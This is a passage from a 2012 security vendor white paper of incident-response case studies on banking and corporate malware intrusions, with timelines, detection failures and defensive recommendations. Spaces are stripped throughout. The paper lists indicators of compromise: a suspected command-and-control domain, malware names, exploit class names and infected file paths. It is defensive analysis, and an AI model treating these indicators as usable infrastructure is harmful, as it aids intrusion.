Asaresult,thecustomerwasunawareofnumerousalerts(includingalmost100criticalalertsina2hourperiodonDay19)issuedbytheIPSduringtheincident.
LogMonitoring-WebsenseMonitoring–TheWebsensecontentfilteringsysteminplaceinthecustomerenvironmentgeneratedhundredsofalertsrelatedtoinfectionactivity,howevernomonitoringoftheWebsenselogswasperformed.
LogMonitoring-WindowsEventLogMonitoring–TheWindowsEventlogsoninfectedsystemsgeneratedalertsrelatedtoinfectionactivity,howevernomonitoringofWindowsEventlogswasperformedoncriticalsystems.
OutboundTrafficMonitoring–BasedonSolutionary'sanalysisofsecuritylogsintheenvironment,theinfectedsystemsgeneratedsignificantnetworkactivityinattemptstoobtainoutboundinternetaccesstocontactcommandandcontrolsystems.
Thisactivitywasloggedinoutboundfirewallandproxyserverlogs–however,theselogswerenotbeingactivelymonitoredbythecustomer.
Apartfromthesedetectionfailures,Solutionaryidentifiednumerousadditionalunsafepracticesintheenvironment,including:InadequateIncidentResponse–Thisorganizationdidnothaveeffectiveincidentresponseproceduresinplace.
Theywereunabletoeffectivelydetecttheattack,andwhentheywerealertedtotheincident,theywerenotabletoeffectivelyidentifyandcleancompromisedsystems.
SecureCredentialDistribution(recommendedforallorganizations)–OneoftheuserPCsinfectedbythezero-dayattackwasusedtodistributepartnerbankcredentialsviaplain-textemail.
Asaresult,itispossiblethataccesstouseraccountswasactuallyaccomplishedviasnoopingintouseremailarchivesontheinfectedPC.
Passwordsshouldonlybedistributedinperson,overthephone,orviaencryptedemail.
Theyshouldneverbesentviaplaintexte-mail.
AnomalousTransactionMonitoring(recommendedforknownAPTtargets)–Morerigorousmonitoringofanomaloustransactionswouldverylikelyhavedetectedthesetransactionsmuchearlier.
Thecustomer'spartnerbankwasabletoidentifythesetransactionsasanomalous,butthecustomerdidnot.
SystemPatchingandHardening(recommendedforallorganizations)–Whilethisorganizationhadanautomatedpatchmanagementsolutioninplace,validationthatpatchesweresuccessfullyinstalledwasnotoccurring.
Asaresult,missingpatchesonPCswerenotdetected.
SolutionaryidentifiedthatPCsinvolvedintheinfectionhadnotbeenpatchedforover6weekspriortotheirinfection.
Itispossiblethattheinitialinfectionoccurredviaexploitationofanunpatchedvulnerabilityonthosesystems.
DataDestruction/Cleanup(recommendedforknownAPTtargets)–Hundredsofpotentiallysensitivedocuments,containingfinancialandpersonnelinformation,werediscoveredonthecompromisedsystems.
Itisnotknownwhethertheattackersaccessedand/orplantoutilizethisinformation.
Additionally,certainsystemsreviewedbySolutionaryhadover20userprofilesontheharddrive.
Whilesharedresourcesarecommonincorporateenvironments,oncriticaldevicesthenumberofauthorizedusersshouldbekepttoaminimum.
Thesedevicesshouldbereviewedonaregularbasistoensurethatoutdateddocuments,browsercachefiles,andunusedprofilesarepurgedfromthesystem.
AppropriateUseofCriticalSystems(recommendedforallorganizations)–Whilecorporationstypicallypermitalimitedamountofpersonaluseofcompanysystems,thispolicyshouldnotnecessarilyextendtosystemsthataccesscriticalfinancialapplications,ormaintainextremelysensitivedata.
Inthiscasestudy,devicesthatwereusedforlarge-scalewiretransfersandauthorizationsalsowereusedforaccessingpersonalwebsites,personalemail,andmediastorage.
Itispossiblethattheinfectionoriginatedbyauserconductingpersonalbusinessonamission-criticaldevice.
18CaseStudy2–Zero-DayInfectionIntroductionThiscasestudyinvolvesthepost-incidentinvestigationofabreachatalargemarketingcorporation.
IncidentTimeline–CaseStudy2DateEventDay1Undetectedzero-dayinfectioninnetwork.
Day10Anti-virusvendorreleasessignatureforzero-dayattack.
Day10Zero-daydetected,andcleanedfromnetworkwithassistanceofanti-virusvendor.
Days10-14FakeaccountscreatedbyAuthorizedUser#1andAuthorizedUser#2onEnterprisesystem.
Day20FakeaccountscreatedbyAuthorizedUser#2areusedtosendafakee-mailcampaignfromthecustomernetwork.
17millione-mailsgeneratedwereusingthesefakeaccounts.
Day44FakeaccountscreatedbyAuthorizedUser#2,AuthorizedUser#3,andstolencredentialsofAuthorizedUser#usedtosendafakee-mailcampaignfromcustomernetwork.
E-mailcampaigncontainedalinkthatinstalledavirus.
Day45Incidentidentifiedbycustomer.
AuthorizedUser#2,AuthorizedUser#3,AuthorizedUser#4systemsalltakenoff-lineandreplaced.
Day45AnothercampaigncreatedfromadifferentIPaddressviasamemethod.
Day46FBIContacted.
Day46Anotherfakee-mailcampaigncreatedusingAuthorizedUser#4'snewcredentialsonAuthorizedUser#5'ssystem.
Day47FakeaccountcreatedbyAuthorizedUser#6.
Day80Solutionarycontacted.
IncidentAnalysisSolutionarywasnotinvolvedintheimmediateinvestigationintothisincident,andasaresult,didnothaveaccesstoallrelevantdata.
However,Solutionary'sforensicinvestigationintotheincidentidentifiedanumberoffactorsleadingtothesuccessfulcompromiseandpersistentuseofthetarget'snetworkbyattackers:IncidentResponse–Inthiscasestudy,itappearedthatdevelopmentpersonnelwereawareofmaliciousactivityoccurringintheenvironment(inDays1-45),butdidnotnotifyinformationsecuritypersonnel.
Asaresult,thisincidentcontinuedtoescalateuntilFBInotificationwasrequired.
Thisisalsoacasewheretheinitialmeansofinfection(malwareusingazero-dayattack)wasusedtogainaccesstotheenvironment,andfromthatpoint,theattackergainedaccesstonumerousadditional19systems,gainingafootholdintheenvironment.
Asaresult,whenthezero-dayinfectionwasdetectedandcleanedonDay10,ithadnoeffectontheattacker,whohadalreadydevelopednumerousotheravenuestoaccesstheenvironment.
SystemPatchingandHardening(recommendedforallorganizations)–Whileit'spossiblethatanattackwilluseazero-dayexploitforwhichnopatchexists,itisfarmorelikelythatattackerswillfirstattempttoexploitpreviouslyidentifiedvulnerabilities,withknownexploits.
Whiletheexactmechanismofdistributionofthezero-daythatinfectedthenetworkisunknown,oneoftheAuthorizedUserharddriveshadnotbeenpatchedforoversixmonthspriortothesuccessfulcompromise,andanotherAuthorizedUserharddrivehadnotbeenpatchedforover10monthspriortothecompromise.
Thereisastrongpossibilitythattheinitialdistributionofthevirustookadvantageofthemissingpatchesonthesemachines.
SensitiveUserAuditing(recommendedforpossibleAPTtargets)–Duringthecourseoftheincident,theattackingpartyusedvalidusercredentialstocreatenumerousfraudulentaccountsonmultiplesystems,inordertoconductattackswithoutbeingdetected.
Detailedauditingandmonitoringofuserandpermissionchangeswouldlikelyhavealertedtheorganizationtothisactivitymuchearlier.
DataDestruction/Cleanup(recommendedforknownAPTtargets)–CertaindevicesreviewedbySolutionaryhadover20userprofilesontheharddrive.
Whilesharedresourcesarecommonincorporateenvironments,oncriticaldevices,thenumberofauthorizedusersshouldbekepttoaminimum.
Additionally,thesedevicesshouldbereviewedonaregularbasistoensurethatoutdateddocuments,browsercachefiles,andunusedprofilesarepurgedfromthesystem.
Appropriateuseofcriticalsystems(recommendedforallorganizations)–Whilecorporationstypicallypermitalimitedamountofpersonaluseofcompanysystems,thispolicyshouldnotnecessarilyextendtouserswhoaccesscriticalfinancialapplications,ormaintainextremelysensitivedataontheirsystems.
Inthisinstance,devicesthathadaccesstocustomerinformation,andhadtheabilitytocreatemasse-mailcampaigns,werealsousedbyusersforaccessingpersonalwebsites,personalemail,andmediastorage.
Itispossiblethattheinfectionoriginatedbyauserconductingpersonalbusinessonamission-criticaldevice.
20CaseStudy3–Dropper/SinowalInfectionIntroductionThiscasestudyinvolvesthecursoryanalysisofamalwareinfectionataregionalcommercialbank.
ThisorganizationwasanexistingSolutionaryActiveGuardmonitoringclient.
Thiscasestudyprovidesaneffectivedemonstrationofthenecessityofmultiplecontrolmethodsinmodernnetworkenvironments.
IncidentTimeline–CaseStudy3DateEventDay1TheSolutionarySOCescalatedanActiveGuardAlerttocustomer,identifyingunusualactivityoriginatingfromaPCthatwasreceivingnumerousICMPType3Code3(DestinationPortUnreachable)messagesfromahostatThePlanet.
comInternetServices,Inc.
Day1Solutionary'scustomerinitiatedresearchfortheAlert.
Theinvestigationresultedinthefollowing:LocalvirusscanningshowednoinfectionNounusualsoftwarewasidentifiedinstalledonthedeviceNounusualDNSentrieswerehardcodedontothedeviceAreviewofinstalledsoftwarehasnotreturnedanythingunusualFirewalllogsshowedrepetitiveactivitytoanunknownhostFirewalllogsshowedrepetitiveactivitytoftsgvvkd.
com–thisdomainwasregisteredelevendayspriortotheoriginalinfectionandtheregistrarisONLINENIC.
COM–someresearchshowsthatthisregistrarisassociatedwithmalicioussitesAcheckofthelocalcacheonthehostwasclearAcheckofthestatic"hosts"fileentriesontheboxwasclearAMalwareBytesscanofthehostwasclearAfterthisreview,Solutionary'scustomerclosedtheAlert.
Day7TheSolutionarySOCescalatedanActiveGuardAlerttocustomeridentifyingadditionalunusualactivityonthesamePC,includingattacksagainstkeyserversonthenetwork,andattemptstocontactcommandandcontrolsystems.
Day18AffecteddeviceremovedfromthenetworkandforwardedtoSolutionaryforanalysis.
Day19Solutionaryperformsinitialanalysisofharddrive,whichrevealsexistenceofnumerouszero-daymalwareinfections.
IncidentAnalysisThefirststepintheDataAnalysiscomponentofSolutionary'sIncidentResponseandForensicframeworkistouseagroupofautomatedcommercialandopen-sourcetoolstoanalyzethemediarelevanttotheinvestigation.
Thetoolsusedineachanalysisaredependentuponthetypeofsystembeinganalyzed,thetypesofsecuritycontrolsknowntobeinplaceinthecustomerenvironment,andinformationaboutthetypeofincidentthathasoccurred.
ThereareanumberofreasonsSolutionaryusesautomatedtoolsinthisfirstanalysisphase:21IdentificationofTechnologyEffectiveness–DetectionofmalwarebysoftwareintheSolutionarytoolkitthatwasundetectablebytechnologiesinthecustomerenvironmentcanidentifynecessarysecuritytechnologiesfortheclientenvironment.
FutureDetection–SoftwareintheSolutionarytoolkitthatdetectsavirus/Trojan/malwarecanbeusedbyclientsforinvestigationoffuturesimilarincidentsintheenvironment,aswellastovalidatethecurrentinfectionstatusofotherdevicesintheenvironment.
EconomyofTesting–Manualreviewsofsophisticatedmalwareattackscanbetime-consuming,andrequireconsiderableexperienceandexpertise.
Byperformingfaster,lower-costscansasafirststepintheanalysisprocess,Solutionaryisabletogatherpotentiallyimportantinformationthatcanbeusedtofacilitatethemanualreviewprocess.
Insomeinstances,automatedtestingmayprovidesufficientinformationtomakemanualtestingunnecessary.
Uponreceiptoftheinfectedsystemharddrive,Solutionaryrananumberofstandardautomatedanti-virusandanti-malwareapplicationsagainstthesuspectdrive.
CaseStudy3–AutomatedAnalysisResultsToolIdentifiedIssueLocationAnti-virusVendor1Trojan.
JS.
Redirector.
leC:/DocumentsandSettings/HelpuserAssistant/LocalSettings/TemporaryInternetFiles/Content.
IE5/1L8MV0E6/cd[1].
htmAnti-virusVendor1Trojan-Dropper.
Java.
Agent.
C:/DocumentsandSettings/LocalService/LocalSettings/TemporaryInternetFiles/Content.
IE5/KCOAEQT7/JnteZAVORP1KAV1[1].
htmlZxU230d9c2eHffdf939bV0100f080006R45bae1e7102Tb3d5dfb4201l0409325/Main.
classAnti-virusVendor1Win32/SinowalC:/DocumentsandSettings/LocalService/LocalSettings/TemporaryInternetFiles/Content.
IE5/KCOAEQT7/JnteZAVORP1KAV1[1].
htmlZxU230d9c2eHffdf939bV0100f080006R45bae1e7102Tb3d5dfb4201l0409325/i.
daAnti-virusVendor2Trojan.
Agent/GenC:/WINDOWS/CSC/D8/800000057Anti-virusVendor3Trojan-Dropper.
Java.
Agent.
C:/DocumentsandSettings/LocalService/LocalSettings/TemporaryInternetFiles/Content.
IE5/KCOAEQT7/JnteZAVORP1KAV1[1].
htmlZxU230d9c2eHffdf939bV0100f080006R45bae1e7102Tb3d5dfb4201l0409325/Main.
classAnti-virusVendor3Win32/SinowalC:/DocumentsandSettings/LocalService/LocalSettings/TemporaryInternetFiles/Content.
IE5/KCOAEQT7/JnteZAVORP1KAV1[1].
htmlZxU230d9c2eHffdf939bV0100f080006R45bae1e7102Tb3d5dfb4201l0409325/i.
datAnti-virusVendor3TR/Spy.
28672.
333C:/WINDOWS/CSC/d4/800000C3Anti-virusVendor3TR/Dropper.
GenC:/WINDOWS/CSC/d5/800000D4Anti-virusVendor3TR/Dropper.
GenC:/WINDOWS/CSC/d6/800000B5Anti-virusVendor4Gen.
Trojan.
Heur!
IKC:\WINDOWS\CSC\d4\800000C3Anti-virusVendor4Riskware.
NetTool.
AngryIP!
IKC:\WINDOWS\CSC\d8\80000057Anti-virusVendor4Trojan.
Win32.
VB!
IKC:\WINDOWS\system32\CCM\Cache\STO00011.
1.
System\lmib.
msi/PO1_278D453034324203BFEBD7D78B3059C7_3C269F0422ToolIdentifiedIssueLocationE76F42388B480A8F99CED78CAnti-virusVendor5NoFindingsofInterestNoFindingsofInterestAnti-virusVendor6NoFindingsofInterestNoFindingsofInterestAnti-virusVendor7NoFindingsofInterestNoFindingsofInterestAnti-virusVendor8NoFindingsofInterestNoFindingsofInterestAnti-virusVendor9NoFindingsofInterestNoFindingsofInterestAnti-virusVendor10NoFindingsofInterestNoFindingsofInterestAnti-virusVendor11NoFindingsofInterestNoFindingsofInterestManualReviewTrojanprogramExploit.
Java.
CVE-‐2010-‐0094.
xsda1/DocumentsandSettings/user/ApplicationData/Sun/Java/Deployment/cache/6.
0/34/c669a2-‐5ca1bd02.
vir//vmain.
classManualReviewTrojanprogramExploit.
Java.
CVE-‐2010-‐0094.
xsda1/DocumentsandSettings/user/ApplicationData/Sun/Java/Deployment/cache/6.
0/34/c669a2-‐5ca1bd02.
vir//vload.
classManualReviewBackdoor.
Win32/dev/sdaManualReviewKeyloggerC:\WINDOWS\system32\calcsn32.
Theresultsofthisanalysisdemonstrateasignificantdiscrepancyintheresultsofdifferentanti-virusscanners/rescueCDs–fourscannersidentifiedmalwareapplicationsonthesystem,andsevenfoundnoproblems.
Theseresultsclearlydemonstrateoneoftheprimaryfocusesofthisdocument–whilevirusscanningisanimportantcomponentofasecurityprogram,thisaloneisinsufficienttoprotectagainstmodernmalware,andshouldbeonlyonepartofamulti-facetedstrategytoprotectagainstmaliciousthreats.
Inthiscase,theSolutionarycustomerwasfortunate,asIntrusionDetectionSystemalertsdetectedanomalousactivityfromthedevice,andinstigatedtheinvestigationthateventuallyidentifiedmalwareonthedevice.
Implementationofamultifaceteddetectionandcontrolstrategyiscriticaltoensuremalwareevadingonetechnology'sdetectionhasthepotentialtobedetectedbyanothertechnologyintheenvironment.
23CaseStudy4–InfectionIntroductionThiscasestudyinvolvestheinvestigationofanincidentataSoftwareasaService(SaaS)provider.
ThisincidentdemonstratesacommonpatternthatSolutionaryhasobservedinanumberofincidents:multiplesystemsarecompromisedusingavarietyoftechniques,sothateliminationoftheinitialmalwareinfectionhasnoimpactontheattacker,whohasnumerousothermechanismstoaccesstheenvironment.
IncidentTimeline-CaseStudy4DateEventDay1UserPCinfectedviaunknownorigin,likelyviaawebbrowservulnerability.
Day1(3:20PM)Maliciousfilesvmain.
classandvload.
classarecreated.
Themachinewascontinuouslyinfectedwithmultipleinfectionsafterthisteam.
Day1(5:05PM)KnownmaliciousfileC:\Windows\Temp\twko\setup.
exeiscreated.
Day2(7:00AM)SymantecdiscoversC:\DocumentsandSettings\networkservice\localsettings\applicationdata\ktl.
exeDay3Symantecdiscoversmultipleinfectionsonthemachine.
Day3(8:48AM)C:\WINDOWS\Temp\bdwp\setup.
exeiscreatedonthemachine–thisapplicationbeginstocaptureaccountcredentialspostedtoHTMLformsonthesystem.
Day3(12:26PM)C:\WINDOWS\system32\calcsn32.
dlliscreatedonthemachine.
Day7(9:10AM)KnownmaliciousfileC:\WINDOWS\Temp\otmw\setup.
exeiscreatedonthemachineDay7(4:00PM)User#1logsintoproductionapplicationfrominfectedPC.
Day8(7:05AM)AttackerusesUser#1'scredentialstologintoproductionapplication.
Day8(7:32AM)Attackercreatesafakeuseraccountonproductionsystem.
Day8(7:34AM)Attackermodifiesfakeuseraccountpermissions.
Day8(7:38AM)Attackercreatesanotherfakeuseraccountonproductionsystem.
Day8(7:39AM)Attackercreatesanotherfakeuseraccountonproductionsystem.
Day120Attackercreatesanotherfakeuseraccountonproductionsystem.
24IncidentAnalysisIncidentResponse–Thisisacasewheretheinitialmeansofinfectionwasusedtogainaccesstotheenvironment,andfromthatpoint,theattackergainedaccesstonumerousothersystems,gainingafootholdintheenvironment.
Asaresult,whentheinitialinfectionwasdetectedandcleanedonDay10,ithadnoeffectontheattacker,whohadalreadydevelopednumerousotheravenuestoaccesstheenvironment.
CaseStudyConclusionsandRecommendationsThecasestudiesdiscussedabovehighlightanumberofsimple,low-costpracticesthatorganizationscanimplementtoimprovedetectionofmalwareinfections,andrespondtothem.
UseRescueDisksforValidation–Modernmalwareoftenhasthecapabilitytodefenditselfagainstdetectionbyanti-virus.
Additionally,itcanhideitselfinlocationsnotscanned,ornotaccessibletoanti-virussoftware.
Asaresult,virusscanningofpotentiallyinfecteddevicesshouldbeperformedusing"rescuedisks",whichrunwhiletheoperatingsystem(andanymalware)isinactive,increasingthepossibilityofdetection.
Differentvendorshavebetterdetectionmechanismsinplacefordifferenttypesofmalware,soSolutionaryrecommendshavingrescuedisksfromatleastthreevendorsavailableforanalysis.
CloselyMonitorNetworkRe-entryofDisinfectedDevices-Disinfecteddevicesshouldbecloselymonitoredforonetotwoweeksafterbeingcleaned.
Asthecasestudiesdemonstrate,anti-virussoftwarecannotbereliedontodetectallmalwareexistingonadevice.
Additionally,WheninDoubt,Rebuild–Insituationswherethereisanydoubtastowhetheraninfectionhasbeeneffectivelyremovedfromasystem,rebuildthesystemfromacorporateimagetoensureremovalofmalicioussoftware.
EffectivelyUseExistingSecurityTechnologies–Wheresecuritytechnologiesareinplaceinanenvironment,ensuretheyarebeingusedeffectively.
Thisincludesimplementationofappropriateconfigurations,and,justasimportantly,effectivemonitoringofeventlogsfromthesetechnologies.
Anomalouseventlogsfromdevicesthatarenotspecificallydesignedtodetectmalware,suchasfirewalldropsandWebsenselogs,canidentifytheexistenceofmalicioussoftwareintheenvironment.
MonitorKeyNon-SecurityTechnologies–Effectivemonitoringofnon-securitytechnologiescanalsoprovidepotentialevidenceofAPT/malwareincidents.
DNSlogsareakeyexampleofthis–whenmalwareisintroducedtoanenvironment,itneedstoconnectbacktocommandandcontrolsystemstoreceivefurtherinstructions.
Often,thesecommandandcontrolsystemsarereachedbythemalwareiteratingthroughalistofpreconfigureddomainnames.
Inmanyinstances,thesedomainshavebeentakenoff-line,orbanned.
Whenthatisthecase,itispossibleforDNSserverstolognumerousconsecutivefailedqueryattemptsfrominfectedsystems.
Monitoringofsuchlogscanbeindicativeofamalwareinfectionintheenvironment.
DevelopEffectiveAuditingandMonitoringforCustomApplications–Insituationswhereanadvancedattackerhasestablishedafootholdinanenvironment,knowledgeofthefunctionalityofcustomerinternalapplicationscanbeeasilyobtained.
Thecasestudiesabovedemonstratethis,wherecustomapplicationswereusedtosubmittransactionsandsendoute-mailmarketingcampaigns.
Itisimportantforcustomapplicationsperformingsensitivefunctionstohavegranularloggingcapabilities,andanomalousactivityintheseapplicationsshouldgeneratealertsthatarereviewedandinvestigatedbyadministrators.
25AboutSolutionarySolutionaryreducestheinformationsecurityandcomplianceburdenbydeliveringflexiblemanagedsecurityservicesthatalignandenhanceclientgoals,existingsecurityprograms,infrastructureandpersonnel.
Thecompany'sservicesarebasedonexperiencedsecurityprofessionals,data-drivenandactionablethreatintelligenceandtheActiveGuardserviceplatform,whichprovidesexpertsecurityandcompliancemanagement.
Solutionaryworksasanextensionofclients'internalteams,providingindustry-leadingcustomerservice,patentedtechnology,thoughtleadership,yearsofinnovationandproprietarycertificationsthatexceedindustrystandards.
ThisclientfocusanddedicationtocustomerservicehasenabledSolutionarytoboastoneofthehighestclientretentionratesintheindustry.
Solutionaryprovides24/7servicestomid-marketandglobal,enterpriseclientsthroughtwosecurityoperationscenters(SOCs)inNorthAmerica.
Formoreinformation,contactSolutionaryat:info@solutionary.
comor866-333-2133ActiveGuardUSPatentNumbers:7,168,093;7,424,743;6,988,208;7,370,359;7,673,049.
Solutionary,theSolutionarylogo,ActiveGuard,theActiveGuardlogo,areregisteredtrademarksorservicemarksofSolutionary,Inc.
oritssubsidiariesintheUnitedStates.
Othermarksandbrandsmaybeclaimedasthepropertyofothers.
Theproductplans,specifications,anddescriptionshereinareprovidedforinformationonlyandsubjecttochangewithoutnotice,andareprovidedwithoutwarrantyofanykind,expressorimplied.
Copyright2012Solutionary,Inc.
Solutionary,Inc.
9420UnderwoodAve.
,3rdFloorOmaha,NE68114